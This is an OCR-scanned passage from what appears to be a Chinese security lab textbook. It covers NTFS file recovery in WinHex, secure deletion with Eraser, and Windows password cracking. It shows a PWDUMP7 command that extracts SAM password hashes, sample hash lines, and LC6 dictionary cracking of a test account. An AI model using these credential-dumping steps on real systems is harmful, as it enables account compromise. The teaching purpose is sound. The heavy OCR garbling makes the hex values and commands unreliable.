值 为 00H ,这 说 明 该 属性 为 常 驻 属 性 , 则 它 不 占用 除 МЕТ 以 外 的 空间 , 即 在 此 属性 的 内 
容 中 ,包含 了 文件 “实验 . txt” 中 写 入 的 数据 内 容 。 


Offset 01234567 8 9 10 11 12 13 14 15 
104654112 BC 01 6С 79 99 60 ВА AB 80 00 00 00 зо 00 00 оо [] 1у1`9«1 
104654128 00 00 18 00 00 00 01 00 12 00 00 00 18 00 00 00 
104654144 BC C6 СВ ЕЗ BB FA B2 А1 B6 ВЕ B7 СО BB A4 ВС BC  XEÉ&»ü? iS. 
104654160 СА F5 00 00 00 00 00 00 FF FF FF FF 82 79 47 11 Ёё yy 
104654176 0B 01 BO 65 FA 5E 20 00 87 65 2C 67 87 65 63 68 *eó^ le, 
104654192 2E 00 74 00 78 00 74 00 80 00 00 00 18 00 00 O0 . t x t I 
104654208 00 00 18 00 00 00 01 00 00 00 00 00 18 00 00 00 
104654224 FF FF FF FF 82 79 47 11 00 00 00 00 00 00 00 00  yyyylyG 
104654240 00 00 00 00 00 00 00 00 00 00 00 оо оо оо 00 00 
104654256 00 00 00 00 00 00 00 O0 00 оо 00 оо оо 00 оо 00 
104654272 00 00 00 00 00 OO OO OO 00 00 00 00 OO 00 оо 00 м 


图 2.16 实验 . txt 的 文件 记录 80H 类 型 属性 


偏 移 量 为 0x10 的 连续 四 个 字 节 的 值 为 12H, 说 明 该 属性 除 属性 头 之 外 的 长 度 为 18 
个 字 节 。 

偏 移 量 为 0x14 的 连续 两 个 字 节 的 值 为 18H., 说 明 该 属性 开始 的 偏 移 为 0x18。 则 从 
偏 移 量 为 0x18 的 位 置 开始 ,之 后 的 18 个 字 节 是 ВОН 类 型 属性 的 内 容 , 也 就 是 文件 的 数 
据 内 容 。 之 前 已 经 说 明 ,我 们 在 文件 “实验 . txt” 中 写 入 的 内 容 为 “计算 机 病毒 防护 技术 ”， 
1 个 汉字 占用 2 个 字 节 ,那么 9 个 汉字 就 需 占用 18 个 字 节 ,这 证 明 我 们 的 分 析 是 正确 的 。 

(8) 删除 文件 后 用 WinHex 观察 扇 区 内 容 有 何 变化 ,并 恢复 被 删除 的 文件 。 

删除 文件 “实验 . txt”, 且 将 文件 从 回收 站 中 移 除 , 用 WinHex 观察 扇 区 内 容 有 何 变 
ft. H WinHex 重新 打开 磁盘 ,发 现 文件 列表 中 还 是 显示 有 文件 “实验 . txt”, 跳 转 到 
$ MFT 中 “实验 . txt” PrfER B IX 。 
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同样 地 ,以 “实验 . txt” 的 文件 记录 的 起 始 位 置 为 基准 , 则 偏 移 量 为 0x16 的 连续 两 个 


字 节 的 值 为 00 00, 即 为 00H DEB] SC PF" SECUS. txt” 已 经 被 删除 。 
O) 恢复 被 删除 的 “实验 . txt” 文 件 内 容 。 


根据 上 面 的 实验 步骤 ,按照 同样 的 方法 ,找到 $MFT 中 “实验 . txt” 的 ВОН 类 型 


属 


性 。 设 80 所 在 位 置 的 偏 移 为 0x00, 则 从 上 面 的 分 析 中 我 们 已 经 知道 ,从 偏 移 量 为 0x18 
的 位 置 开 始 , 之 后 的 18 个 字 节 是 80H 类 型 属性 的 内 容 , 也 就 是 文件 的 数据 内 容 。 选 定 这 
18 个 字 节 , 单 击 WinHex 工具 栏 的 Edit 一 Copy Block-Into New File, 如 图 2. 17 所 示 ， 


可 将 这 18 个 字 节 导入 新 文件 中 ,输入 文件 名 为 “实验 . txt”, 单 击 “ 保 存 ” 按 钮 。 


Search Position View Tools Specialist Options Window Help 


ит ? АЗИМ Atl ања 


CtrltC 


Mex Values — Ctrl+ShifttC 
Editor Display ALUShifUC 10 20130222 18500. SH 
k0.. 2013-02-22 18:500. SH 


Paste Zero Bytes. 


Define Block. GREP Hex 
Select АШ СЫЛА | C Source Ко... 20130222 18500. SH 
Clear Block Esc Pascal Source 10... 2013-02-22 1850.0. SH 


0130222 18523... 20130222 18:54:2.. 2013-02-22 18542... IA 
CtrltT 20120222 18562... 20130222 18562... 20130222 18562. A 


CtrltL 1 2 3 4 5 6 7 8 9 10 11 12 1 


Са 


—/ 


| 104654192 |2E 00 74 00 78 00 74 00 
104654208 00 00 18 00 00 00 01 00 
104654224 ЕЕ FF FF FF 82 79 47 11 
Defaut Edit Mode cw 104654240 00808 00 00 O0 00 00 00 


80 оо оо оо 18 0 
00 оо 00 00 18 0 
оо оо 00 оо 00 0 
оо оо оо 00 00 0 


图 2.17 实验 . txt 的 数据 恢复 


单 击 “ 保 存 ”" 后 , WinHex 会 弹出 一 个 新 界面 ,里 面 显示 的 是 “实验 . txt” 的 数据 内 容 ， 


如 图 2. 18 所 示 。 


Г] dit Search Position View Tools Specialist Options Window Мер 
DEUSTE tabr MAEA 
Drive Ci | Drive б: | Drive Е: [ i wt | F (xt | 


э ==» ањәшо «bruni 


Offset 0o. 1 2 8 9 10 11 12 13 14 15 
00000000 


00000016 


Г 3.4 5 6 7 
实验 mw 
ES CA FS Ёё 
File size: 188 
18 bytes | 
Defaut Edt Mode 
State 
Undo levet 0 
Undo reverses: na 
Creation time: 2013-02-22 
20:20:54 
Last write time: 2013-02-22 
202352 
Attributes: A 
Icons: 0 
Mode: hexadecimal 
Character set ANSI ASCII 
Offsets: decimal 
Bytes per page:21x16=336 
Window H: 4 
No. of windows: 5 


Clipboard: empty |.« EE == = ры EY -— == — =] 
Page 1 of1 | Оек 0 =188 Block: 


BC C6 СВ ЕЗ BB FA B2 A1 B6 BE B7 СО BB A4 BC BC | M&E&»ü?i*Xx- 


图 2.18 实验 . txt 的 数据 内 容 
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之 后 打开 磁盘 下 ,我 们 可 以 发 现 其 中 有 了 一 个 名 为 “实验 . txt” 的 文件 ,打开 此 文件 ， 
内 容 为 “计算 机 病毒 防护 技术 ”, 这 与 被 删除 的 文件 “实验 . txt” 是 相同 的 ,如 图 2. 19 所 示 。 


~ Нет Volume (E:) 
ЖР?) Gat EEV ША IAT) #80) 


Ө=- O- Рэя Ex m 
E EEN E 


文件 和 文件 夹 任务 


=й mesi 
Gy 移动 这 个 文件 Xo) RED ELO FEV HHW 
复制 这 个 文件 计算 机 病毒 防护 技术 

2 үр них 


у 打印 这 个 文件 


类 型 : 文本 文档 修改 日 期 : 2013-2-22 20" = " 
图 2.19 实验 . txt 的 数据 恢复 成 功 


2.5 用 Eraser 安全 删除 文件 实验 


2.5.1 实验 目的 
了 解 文件 删除 的 原理 ,掌握 利用 Eraser 工具 安全 删除 文件 的 方法 。 


2.5.2 实验 内 容 及 环境 


1. 实验 内 容 

利用 Eraser 工具 安全 删除 文件 和 磁盘 剩余 空间 。 

2. 实验 环境 

主流 配置 计算 机 一 台 ,安装 Windows 7 操作 系统 和 Eraser 6. 2.0 软件 。 

Eraser 是 一 种 可 以 彻底 删除 文件 的 高 级 安全 工具 ,能 帮助 用 户 独 立 完成 对 磁盘 驱动 
器 中 敏感 数据 的 多 次 覆盖 ,可 以 彻底 清除 已 删除 文件 的 任何 痕迹 。 程 序 内置 Gutmann 
( 古 特 曼 ) 算 法 ,符合 美国 防 部 US DoD 5220. 22-M 标准 的 US DoD 5220. 22-M(C And E) 
消除 算法 以 及 速度 快 且 防止 软件 恢复 的 Pseudorandom Data( 伪 随机 数据 覆盖 ) 算 法 等 ， 
此 外 软件 允许 用 户 自己 定制 消除 算法 。 
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2.5.3 实验 步骤 


1. 设置 擦 除 算法 

按 默 认 配 置 安装 Eraser 软件 后 ,运行 程序 , 单 击 菜单 Settings, 出 现 如 图 2. 20 所 示 的 
设置 界面 ,在 Eraser Settings 栏 中 可 以 设置 默认 的 文件 擦 除 算法 , 单 击 Default file 
erasure method 右 侧 的 列表 框 ,罗列 了 多 种 擦 除 算法 (标准 ) ,如 果 你 想 最 安全 擦 除 ,请 选 
择 使 用 gutmann( 古 特 曼 ) 算 法 ,通常 情况 下 ,我 们 选择 美国 防 部 US DoD 5220. 22-M7 次 
即 可 , 选 定 后 单 击 “ 确 定 ” 按 钮 。 


D Eraser 


| ЖОЕТ ено: 


Settings 


Shell integration 


User interface language: English 


VI Integrate Eraser into Windows Explorer 


Erase settings 
Default file erasure method: Gutmann (35 passes) 


Default drive erasure method: p 
US DoD 5220.22-M (8-306./E, C & E) (7 passes) 
Randomness data source: RCMP TSSIT OPS-II (7 passes) 
Schneier 7 pass (7 passes) 
German VSITR (7 passes) 
Tl Replace erased files with the following files to allow pl Us DoD 5220.22-M (8-306./Е) (3 passes) we ) 
British HMG 155 (Enhanced) (3 passes) 
US Air Force 5020 (3 passes) 
US Army AR380-19 (3 passes) 
Russian GOST P50739-95 (2 passes) 


V] Force locked files to be unlocked for erasure 


British HMG IS5 (Baseline) (1 pass) 
Pseudorandom Data (1 pass) 
First/last 16KB Erasure 


图 2.20 文件 擦 除 算法 设置 


同样 ,我 们 也 可 以 通过 参数 Default drive erasure method 设置 擦 除 磁盘 未 使 用 空间 
所 使 用 的 算法 ,如 图 2. 21 所 示 。 

2. 擦 除 单个 或 多 个 文件 

在 资源 管理 器 中 ,在 选中 的 单个 或 多 个 文件 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 
Erase, 如 图 2. 22 所 示 ,再 在 弹出 的 对 话 框 中 选择 Yes, 擦 除开 始 , 结 束 后 显示 擦 除 信 息 。 

在 快捷 菜单 中 选择 Eraser Secure Move( 安 全 移动 ) ,表示 将 文件 移动 到 X 处 ,同时 擦 
除 原文 件 。 

3. 擦 除 文 件 夹 

如 果 某 一 文件 夹 及 该 文件 夹 中 内 容 都 不 需要 了 ,我 们 可 以 像 擦 除 文 件 一 样 擦 除 该 文 
件 夹 , 右 击 该 文件 夹 ,在 弹出 的 快捷 菜单 中 选择 Erase, 擦 除 时 间 长 短 由 文件 夹 包含 的 文 
件数 和 文件 总 的 大 小 决定 ,文件 数 越 多 ,文件 越 大 , 擦 除 时 间 越 长 。 
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Ө Eraser | [= е ш] 


| Ese Schedule |+ ffy Settings 


Settings 


Shell integration 


User interface language: English "| 


m 


V Integrate Eraser into Windows Explorer 


Erase settings 


Default file erasure method: Gutmann (35 passes) "| 
Default drive erasure method: Pseudorandom Data (1 pass) 3s 
Randomness data source: Gutmann (35 passes) 
US DoD 5220.22-M (8-306./E, С & E) (7 passes) 
VI Force locked files to be unlocked for erasure RCMP TSSIT OPS-II (7 passes) 
Replace erased files with the following files to allow pl Schneier 7 pass (7 passes) ме ) 


German VSITR (7 passes) 
US DoD 5220.22-M (8-306,/E) (3 passes) 
British HMG 155 (Enhanced) (3 passes) 
US Air Force 5020 (3 passes) 

US Army AR380-19 (3 passes) 

Russian GOST P50739-95 (2 passes) 

h HMG IS5 (Baseline) (1 pass) 


图 2.21 磁盘 未 使 用 空间 控 除 算法 设置 


=“ 了 注册 表 子 键 功 能 全 解释 . doc 


IFO 


REINO randi 8 化 人 的 内 存 使 有 жа ы 
ЖҮН ЗЕР. doc | Heo 


局 域 网 中 巧 用 MaxD0s 进 行 GHDST 多 播 装 系统 . doc Eraser Secure Move 
开始 > 运行 ( cmd ) 命令 大 全 .doc 


和 人 toe rr 
d | 
| 


康 价 实用 的 视频 直播 系统 . doc 打开 方式 0 
Газавая 
DTE 

如 何 搭建 局 域 网 内 部 sus 服 务 . doc | ER ошо 


[IE hnim eme eaa 


Р 2.22 ХЕ 


4. 擦 除 磁盘 剩余 未 使 用 空间 

在 过 去 长 期 的 计算 机 使 用 中 ,文件 的 删除 总 是 使 用 普通 的 方法 删除 ,所 以 磁盘 中 有 
大 量 的 文件 可 以 被 恢复 ,这 些 文件 就 存在 于 磁盘 剩余 未 使 用 空间 中 ,那么 怎样 擦 除 磁 
盘 剩 余 未 使 用 空间 呢 ? 在 资源 管理 器 中 , 右 击 磁盘 盘 符 ,在 弹出 的 快捷 菜单 中 选择 
Erase Unused Space, 如 图 2. 23 所 示 。 在 弹出 的 对 话 框 中 选择 Yes, 擦 除开 始 ,结束 后 显 
示 擦 除 信息 ,由 于 磁盘 未 使 用 空间 一 般 较 大 ,所 以 该 擦 除 执行 时 间 比 较 长 ,请 耐心 


$25 数据 核 复 与 安全 删除 e^ 


m «xim o RFO 


8 < Disk- F) 资源 管理 器 CO) 
mæ 1150-2 (6:) 打开 @) 


用 ACDSee Pro 2 浏览 
BED... 


国 加 共享 文档 E 
a Q АЕ 前 瑞 星 杀 毒 软 件 网 络 版 
9 кшм 共享 和 安全 QD 


图 2.23 擦 除 磁盘 剩余 未 使 用 空间 


2.6 练 习 й 


CD 创建 一 个 文件 ,用 Eraser 删除 后 ,利用 Easy Recovery 是 否 能 够 恢复 ,请 通过 实 


(2) 创建 一 个 文件 , 按 Shift 十 Delete 组 合 键 删除 后 ,在 文件 所 在 路 径 下 创建 一 个 新 的 
文件 ,利用 Easy Recovery 是 否 能 够 恢复 删除 的 文件 ,请 通过 实验 进行 验证 。 

(3) 当 删 除 的 文件 比较 大 ,文件 数据 不 是 直接 存储 在 МЕТ 的 文件 目录 中 ,而 是 通过 
文件 记录 中 的 “数据 运行 指出 文件 存储 空间 ,请 根据 2. 2. 2 节 描 述 的 方法 通过 WinHex 
进行 文件 恢复 并 验证 。 
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3.1 概 Ж 


身份 认证 是 验证 主体 的 真实 身份 与 其 所 声称 的 身份 是 否 相符 的 过 程 , 它 是 信息 系统 
的 第 一 道 安全 防线 ,如 果 身 份 认证 系统 被 攻破 ,那么 信息 系统 其 他 所 有 安全 措施 将 形 同 虚 
设 , 因 此 ,身份 认证 是 信息 系统 其 他 安全 机 制 的 基础 。 

口令 (Password) 俗 称 密码 ,是 由 数字 、 字 母 等 构成 的 一 个 字符 串 , 是 只 有 用 户 自己 和 
计算 机 信息 系统 知道 的 秘密 信息 ,基于 口令 的 认证 简单 易 行 ,是 最 常用 的 身份 认证 方式 。 
口令 攻击 是 最 易 被 攻击 者 考虑 的 攻击 途径 ,攻击 者 会 采用 多 种 方法 试图 猜 出 用 户 设置 的 
口令 ,尤其 是 猜测 出 管理 员 的 口令 以 进入 系统 实施 进一步 破坏 。 从 安全 的 角度 来 说 ,对 口 
令 攻 击 进行 防范 、 在 口令 攻击 发 生 时 进行 告警 是 安全 防护 的 一 个 重要 内 容 。 


3.2 口令 攻击 技术 


3.2.1 Windows 系统 下 的 口令 存储 


口令 认证 机 制 是 Windows 系列 操作 系统 提供 的 最 基本 的 身份 认证 方式 。Windows 
操作 系统 口令 采用 两 种 加 密 算法 加 密 后 存储 在 SAM(Security Account Manager) 数 据 库 中 ， 
一 般 位 于 $ SystemRoot/System32/Config/ 目录 下 ,每 个 用 户 信息 格式 形 如 : Administrator: 
500:C8825DB10F2590EAAAD3B435B51404EE:683020925C5D8569C23AA724774CE6CC:::， 
其 中 Administrator 为 用 户 名 ,500 为 RID 号 ,C8825DB10F2590EAAAD3B435B51404EE 
为 口令 经 LM-Hash 算法 加 密 后 的 值 ,683020925C5D8569C23AA724774CE6CC 为 口令 
经 NTLM-Hash 算法 加 密 后 的 值 。 

LM-Hash 算法 过 程 如 下 。 

CD 将 用 户口 令 字 中 的 小 写字 母 改写 成 大 写字 母 。 当 口令 长 度 大 于 14 个 字符 时 只 
取 14 个 , 当 口 令 长 度 不 足 14 个 时 用 空格 (ASCII 码 值 0X20) 补 足 为 14 个 字符 。 

(2) 将 用 户口 令 所 确定 的 14 个 字符 按 前 7 个 和 后 7 个 分 为 两 组 , 记 为 КІ 和 K2. 

G) 分 别 以 Kl 和 K2 为 密 钥 ,用 DES 算法 对 固定 明文 PO 加 密 , 产 生 两 个 8 字 节 的 密 文 
Cl、C2。 其 中 Po 为 魔术 字符 串 "KGS! @# $ %", 转 化 为 十 六 进 制 值 为 0X4843532140232425。 

(4) 将 两 个 8 字 节 密 文 C1、C2 连接 为 16 字 节 的 散 列 值 。 
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LM Hash 算法 采用 了 比较 弱 的 DES 加 密 算 法 , 且 不 管用 户 设置 的 口令 有 多 长 ,算法 
仅 对 前 14 个 字符 进行 加 密 , 因 而 采用 增加 口令 长 度 、 变 换 大 小 写 等 方法 对 增强 口令 安全 
无 用 ,这 种 算法 比较 容易 被 破解 ,不 够 安全 。 为 了 保持 向 后 兼容 性 , Windows Vista 之 前 
的 版 本 仍 保留 了 这 种 加 密 机 制 。 此 后 微软 又 提出 了 新 的 口令 加 密 机 制 NTLM Hash, 其 
加 密 过 程 是 将 用 户口 令 转换 成 Unicode 编码 ,再 利用 MD4 算法 进行 加 密 , 就 得 到 了 最 后 
的 NTLM Hash 值 。NTLM Hash 算法 采用 了 较 安 全 的 单 向 加 密 算 法 MD4, 且 用 户 可 通 
过 增加 口令 长 度 、 变 换 字母 大 小 写 等 方法 增强 口令 安全 ,相对 于 LM Hash 算法 来 说 ,安全 性 
更 强 ,Windows Vista 之 后 的 Windows 系统 中 仅 存 储 NTLM Hash 算法 加 密 的 密 文 。 


3.2.2 Linux 系统 下 的 口令 存储 


Linux 是 类 Unix 系统 ,基本 沿用 Unix 中 的 安全 机 制 。Linux 中 所 有 与 用 户 相 关 的 
信息 存储 在 系统 中 的 /etc/passwd 文件 中 ,该 文件 是 一 个 典型 的 数据 库 文件 ,每 一 行 都 由 
7 个 部 分 组 成 ,每 两 个 部 分 之 间 用 骨 号 分 隔 开 , 包 含 用 户 的 登录 名 、 经 过 加 密 的 口令 等 ,其 
基本 格式 为 : 


username: password:uid:gid:comments:directory: shell 


ix 7 个 部 分 分 别 描述 了 以 下 信息 : 用 户 名 口令、 用 户 ID ,用户 组 人 D、 用 户 描 述 、 用 户 
主 目 录 、 用 户 的 登录 Shell. F ifii 314835 。 

OD 用 户 名 : 用 户 的 登录 名 。 

(2) 口令 : 用 户 的 口令 ,以 加 密 形式 存放 。 该 域 值 如 为 x 表示 口令 存储 在 /etc/ shadow 中 。 

(3) HIP! IDCUIDO : 系统 内 部 以 UID 标识 用 户 ,范围 为 0 一 32767 之 间 的 整数 。 

(4) MPH ID(GID): 标志 用 户 所 在 组 的 编号 。 将 用 户 分 组 管理 是 Unix 类 操作 系 
统 对 权限 管理 的 一 种 有 效 方式 。 假 设 有 一 类 用 户 都 要 赋予 某 个 相同 的 权限 ,对 用 户 分 别 
授权 将 会 很 复杂 ,但 如 果 把 这 些 用 户 都 放 入 一 个 组 中 ,再 给 组 授权 ,就 容易 多 了 。 一 个 用 
户 可 以 属于 多 个 不 同 的 组 。 组 的 名 称 和 信息 放 在 另 一 个 系统 文件 /etc/group 中 ,与 用 户 
标识 符 一 样 ,GID 的 范围 也 是 0 一 32767 之 间 的 整数 。 

(5) 用 户 描述 : 这 个 域 中 记录 的 是 用 户 本 人 的 一 些 情况 ,如 用 户 名 称 、 电 话 和 地 址 
等 。 该 域 的 作用 随 着 系统 功能 的 增强 ,已 经 失去 了 原来 的 意义 。 一 般 情 况 下 ,约定 该 域 存 
放 用 户 的 基本 信息 ,也 有 的 系统 不 需要 该 域 。 

(6) 用 户主 目录 : 这 个 域 用 来 指定 用 户 的 主 目录 (home), 当 用 户 成 功 进 入 系统 后 ,他 
就 会 处 于 自己 的 用 户主 目录 下 。 

一 般 情况 下 ,管理 员 将 在 一 个 特定 的 目录 里 依次 建立 各 个 用 户 的 主 目录 ,目录 名 一 般 
就 是 用 户 的 登录 名 。 用 户 对 自己 的 主 目录 有 完全 控制 的 权限 ,其 他 用 户 对 该 目录 的 权限 
需要 管理 员 手 动 分 配 。 如 果 没 有 指定 用 户 的 主 目录 ,用 户 登录 时 将 可 能 被 系统 拒绝 或 获 
得 对 根 目录 的 访问 权 , 这 是 非常 危险 的 。 

(7) 用 户 的 登录 Shell: Shell 程序 是 一 个 命令 行 解释 器 , 它 能 够 读 取 用 户 输入 命令 ， 
并 将 执行 结果 返回 给 用 户 ,实现 用 户 与 操作 系统 的 交互 , 它 是 用 户 进程 的 父 进程 ,用 户 进 
程 多 由 Shell 程序 来 调用 执行 。 在 Unix 系统 中 有 很 多 Shell 程序 ,如 /bin/sh、/bin/csh、/ 
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bin/ksh 等 ,每 种 Shell 程序 都 具有 不 同 的 特点 ,但 基本 功能 是 一 样 的 。 

在 Linux 中 ,用 户 登录 时 通常 要 求 输入 用 户 名 ,口令 信息 ,用 户 名 是 标识 , 它 告 诉 计算 
机 该 用 户 是 谁 ,而 口令 是 确认 数据 。Linux 使 用 改进 的 DES 算法 (通过 调用 erypc O 函数 
实现 ) 对 其 加 密 ,并 将 结果 与 存储 在 数据 库 中 的 加 密 用 户口 令 进 行 比较 , 若 两 者 匹配 , 则 说 
明 该 用 户 为 合法 用 户 ,否则 为 非法 用 户 。 

为 了 防止 口令 被 非 授权 用 户 盗 用 ,对 其 设置 应 以 复杂 不 可 猜测 为 标准 。 一 个 好 的 口 
令 应 该 满足 长 度 和 复杂 度 要 求 ,并 且 定 期 更 换 , 通 常 ,口令 以 加 密 的 形式 表示 ,由 于 /etc/ 
passwd 对 任何 用 户 可 读 , 常 成 为 口令 攻击 的 目标 ,在 后 期 的 Unix 版 本 以 及 所 有 Linux 版 
本 中 ,引入 了 影子 文件 的 概念 ,将 密码 单独 存放 在 /etc/shadow 中 ,而 原来 /etc/passwd Ж 
件 中 存放 口令 的 域 用 x 来 标记 。 文件 /etc/shadow 只 对 root 用 户 拥 有 读 权 ,对 普通 用 户 
不 可 读 , 以 进一步 增强 口令 的 安全 。 


3.2.3 口令 攻击 的 常用 方法 


口令 攻击 常用 的 方法 包括 字典 攻击 .暴力 破解 、 混 合 破解 。 

字典 攻击 是 一 种 典型 的 网 络 攻击 手段 ,利用 字典 库 中 的 数据 不 断 进行 用 户 名 和 口令 
的 反复 试探 。 一 般 攻 击 者 都 拥有 自己 的 攻击 字典 ,其 中 包括 常用 的 词 ` 词 组 .数字 及 其 组 合 
等 ,并 在 攻击 过 程 中 不 断 充实 ,丰富 自 己 的 字典 库 , 攻 击 者 之 间 经 常 也 会 交换 各 自 的 字典 库 。 

暴力 破解 是 让 计算 机 尝试 所 有 可 能 的 口令 ,最 终 达 到 破解 口令 的 目的 。 

混合 破解 介 于 字典 破解 和 暴力 破解 之 间 ,字典 攻击 只 能 发 现 字典 库 中 的 单词 口令 , 暴 
力 破解 虽然 一 定 能 破解 口令 ,但 速度 慢 、 破 解 时 间 长 。 混 合 破解 综合 了 字典 破解 和 暴力 破 
解 的 优 缺 点 ,使 用 字典 单词 并 以 在 单词 尾部 串 接 几 个 字母 和 数字 的 方法 来 反复 试探 用 户 
名 和 口令 ,最 终 找 到 正确 的 口令 。 

按 口 令 破解 的 时 机 ,口令 破解 又 分 为 在 线 和 离线 两 种 方式 。 在 线 破解 是 指 攻击 者 在 
口令 登录 提示 框 中 输入 不 同 的 随机 口令 来 猜测 正确 的 口令 。 目 前 ,大 多 数 账户 都 会 设置 
一 个 账户 锁定 阔 值 (比如 5 次 ) , 当 不 成 功 登录 次 数 超过 阔 值 后 就 不 允许 登录 ,这 样 就 可 以 
锁定 攻击 者 。 因 为 在 线 猜测 的 局 限 性 ,今天 大 多 数 口令 攻击 采用 离线 破解 的 方式 。 利 用 
离线 破解 方法 ,攻击 者 窃取 口令 密 文 文件 (通常 为 摘要 文件 ) ,破解 时 可 以 采用 字典 攻击 或 
暴力 破解 方法 ,依次 产生 口令 ,然后 生成 这 些 口令 的 摘要 ( 称 为 候选 口令 ) ,将 这 些 摘 要 与 
窃取 到 的 摘要 值 进 行 比 对 ,如 果 找 到 匹配 项 , 则 攻击 者 就 能 知道 与 摘要 匹配 的 口令 了 ,这 
种 破解 方法 的 效率 比较 低 。 改 进 方法 是 可 以 预先 计算 各 口令 的 摘要 值 记 录 在 数据 文件 
中 ,在 需要 时 直接 调用 数据 文件 破解 ,可 以 大 幅度 提高 破解 的 效率 ,事先 构造 的 Hash 摘 
要 数据 文件 被 称 为 Table 表 , 最 有 名 的 就 是 Rainbow Table, 也 即 彩 虹 表 ,后 续 实 验 中 会 
依次 采用 字典 攻击 、 暴 力 破解 和 彩虹 表 实 施 口 令 破解 。 


3.3 Windows 系统 环境 下 的 口令 破解 实验 


3.3.1 实验 目的 
掌握 Windows 系统 环境 下 的 口令 散 列 的 提取 方法 ; 掌握 利用 LC6 进行 口令 破解 的 
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方法 ; 理解 设置 复杂 口令 原则 的 必要 性 。 
3.3.2 实验 内 容 及 环境 


1. 实验 内 容 

本 实验 主要 通过 LC6(LOphtCrack 6) 利 用 字典 攻击 、 暴 力 破 解 实现 对 本 地 Windows 
系统 的 口令 破解 ,并 通过 设置 不 同 复杂 度 的 口令 来 验证 口令 复杂 度 对 口令 破解 难度 的 
影响 。 

2. 实验 环境 

主流 配置 计算 机 一 台 ,安装 Windows 7 操作 系统 、LC6 软件 和 PWDUMP 7 软件 。 

LC6 是 一 款 口令 破解 工具 ,管理 员 也 可 以 使 用 该 工具 检测 用 户 设置 的 口令 是 否 安 
全 ,被 普遍 认为 是 当前 最 好 、 最 快 的 Windows 系统 管理 员 账 号 口令 破解 工具 。 

PWDUMP 是 一 款 Windows 系统 环境 下 的 密码 破解 和 恢复 辅助 工具 。 它 可 以 将 
Windows 系统 环境 下 的 口令 散 列 ,包括 NTLM 和 LM 口令 散 列 从 SAM 文件 中 提取 出 
来 ,并 存储 在 指定 的 文件 中 。 


3.8.8 实验 步骤 


1. 安装 并 运行 LC6 
正确 安装 LC6 软件 后 运行 LC6, 出 现 如 图 3. 1 所 示 的 LC6 向 导 , 向 导 通 过 5 个 步骤 
完成 口令 破解 相关 参数 的 设置 。 


Then, LOphtCrack 6 vill proceed auditi 

the passwords and report status to you 

along the жау, notifying you when ts 
is complete. 


Press 'Next' to continue with 


[Bes t show me this wizard ...— 


bg 


图 3.1 LC6 向 导 
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2. 以 默认 设置 破解 本 地 账户 口令 
向 导 中 的 默认 设置 是 以 字典 攻击 方式 破解 本 地 账户 口令 信息 ,按照 默认 设置 破解 口 
令 结果 如 图 3. 2 所 示 ,界面 显示 当前 系统 中 的 活动 用 户 lenovo 的 口令 为 空 。 


Күл {ж ЖЕЕ) ИШҮНЕ 


шы Ө QUOX спала ласт, 
СТН ЕЯ алта 


Wizard Hashes From Snitfer Options Espred Accounts 


Locked Out Disabled | Expired 


2018 09:06:42 Multi-core operation with 4 cores. 
2018 09:06:43 Imported 2 accounts from the local machine 
2018 09:06:43 Audit started. 

12/20/2018 09:06:44 Auditing session completed. 


图 3.2 破解 系统 账户 口令 
3. 添加 测试 用 户 


运行 cmd. exe, 用 net user 命令 给 系统 添加 一 个 测试 用 户 ,并 为 该 用 户 设置 一 个 纯 数 
字 的 口令 ,如 图 3. 3 所 示 。 


( tag SA: CAWindows system32Vemd exe. —- ч Кеа 
qd 6.1.7601] 
所 有 (с) 2009 Microsoft Corporation. {Ж РТА]. 


C: \Users\lenovo>net user test 123456 /add 
功 完成 。 


图 3.3 为 系统 添加 测试 用 户 


4. 用 PWDUMP 导出 口令 散 列 

在 命令 行 里 运行 PWDUMP 工具 ,将 导出 的 Windows 系统 SAM 文件 内 容 保 存在 
1. txt 文档 中 ,如 图 3.4 所 示 。 

5. 查看 SAM 文件 内 容 

打开 C:APWDUMP 7M. txt, 可 以 看 到 PWDUMP 7 将 Windows 系统 环境 下 的 口令 
散 列 从 SAM 文件 中 提取 出 来 了 .由 于 Windows vista 之 后 的 版 本 不 再 存储 LM 加 密 的 密 
文 信息 ,所 以 原来 存储 LM 密 文 的 用 户 信 息 的 第 三 个 域 均 为 空 ,显示 为 NO PASSWORD, 如 
图 3.5 所 示 。 
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Ей SA: CAWindows|system32 cmd exe W ә т = [pem] 


Microsoft Windows Е 6.1.7601] 
HÆ (c) 2009 Microsoft Corporation. {F 


С :\Џѕеғѕ\1епоџо>са ../../ 
С:\>са pudump? 


Вс : \pwdump7>PwDump? . exe >1 .txt 

Pwdump uT.1 - raw password extractor 
Author: Andres Tarasco Acuna 

url: http://www.514.es 


К:\рнацарт› 


一 * 


图 3.4 用 PWDUMP 导出 口令 散 列 


1- aa —- eem] 
RAA Wo о) вау нан 
Administrator:500:NO РАЅ5ЖОКржжжжж жж - 31D6CFE0D16AE931B73C59D7E0C089C0::: * 
Guest:501:NO РА$5#ОЕрж**жжжжжжжжжжжжжжжжжжж*:ЦО РА55#ОКО®жжжжжжжжжжжжжжжжжжжж. 
lenovo:1000:NO РА$$5#ОЕ0®*®***ж*жжжжж®жжжжж**** : 31DGCFEOD16AE931B73C59D7E0C089! : 
test:1009:NO РА$5#ОКО*®***ж*жжжжжжжжжжжжжжжжж* : 3237087 BDBSFDCSE9CBA88517376818D4 : : : 


图 3.5 导出 的 口令 散 列 内 容 


6. 设置 口令 破解 方式 

在 LC6 主 界面 上 单 击 Session Options 图 标 ,出现 如 图 3. 6 所 示 的 界面 ,该 界面 主要 
用 于 设置 口令 破解 参数 ,默认 情况 下 采用 字典 攻击 方式 破解 LM 口令 ,由 于 在 Windows 7 
果 作 系统 中 不 存储 LM 口令 ,因而 需要 勾 选 Crack NTLM Passwords 选项 ,设置 为 采用 
字典 攻击 方式 破解 NTLM 口令 , 单 击 Dictionary 图 标 , 可 以 编辑 查看 字典 文件 。 

7. 加 载 破解 目标 

L6 软件 启动 时 就 已 经 为 用 户 建立 了 一 个 默认 的 会 话 ,在 此 基础 上 单 击 Import 
Hashes 图 标 , 加载 要 破解 的 系统 信息 ,在 选项 卡 Import from file 中 选择 From 
PWDUMP, 单 击 右 侧 的 Browse 按钮 ,选择 PWDUMP 文件 ,这 里 选择 刚刚 利用 
PWDUMP 工具 导出 的 1.txt 文件 ,设置 完成 后 , 单 击 OK 按钮 ,完成 口令 文件 的 导入 ,如 
图 3.7 所 示 。 

8. 实施 破解 

单 击 工具 栏 上 的 Begin 图 标 开 始 破解 ,可 以 发 现 test 用 户 的 口令 123456 被 成 功 破 
解 ,如 图 3.8 所 示 。 

修改 test 用 户 的 口令 ,设置 为 Al123DF ,按照 刚才 的 步 又 加 载 口令 文件 ,采用 字 
